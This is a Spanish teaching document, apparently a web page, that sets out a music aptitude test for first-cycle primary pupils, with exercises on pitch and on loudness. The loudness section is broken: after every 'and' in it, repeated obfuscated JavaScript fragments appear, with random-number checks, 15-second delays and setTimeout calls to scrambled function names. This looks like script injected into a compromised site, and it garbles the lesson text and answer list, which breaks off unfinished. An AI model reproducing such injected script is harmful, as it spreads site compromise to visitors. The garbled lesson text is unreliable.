TEST DE EVALUACIÓN DE APTITUDES MUSICALES PARA ALUMNOS DE PRIMER CICLO DE EDUCACIÓN PRIMARIA

Autoras: Patricia Hernández Hernández y Sara Abel Santiago González

           Se propone un test para evaluar las aptitudes musicales de niños de primer ciclo de Educación Primaria, que nos puede servir como evaluación final para el primer curso e inicial para el segundo. Concretamente, pretendemos saber si los niños han interiorizado las diferentes cualidades del sonido y, para ello, se utilizarán los instrumentos del aula.


          El desarrollo de los diferentes ejercicios que se van a llevar a cabo en el test será el siguiente:

1.- Distinción de sonidos por su altura

          REALIZACIÓN: Con un piano/xilófono, realizamos escalas ascendentes y descendentes aleatoriamente. Los niños deben dibujar una de las siguientes figuras según se trate de una escala descendente  o ascendente:


Para escalas ascendentes                                                       Para escalas descendentes


          La aplicación de este ejercicio es:

1.- escala ascendente;

2.- escala descendente;

3.- escala descendente;

4.- escala ascendente.


2.- Distinción de sonidos por su intensidad.

          REALIZACIÓN: Con instrumentos de sonidos indeterminados (pandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andero, triángulo, maracas…) realizar secuencias de más o menos intensidad. Los niños deben dibujar círculos pequeños para sonidos de menor intensidad y círculos grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes para sonidos de mayor intensidad.


          Los alumnos deben dibujar un círculo:

1.- grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande;

2.- grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande;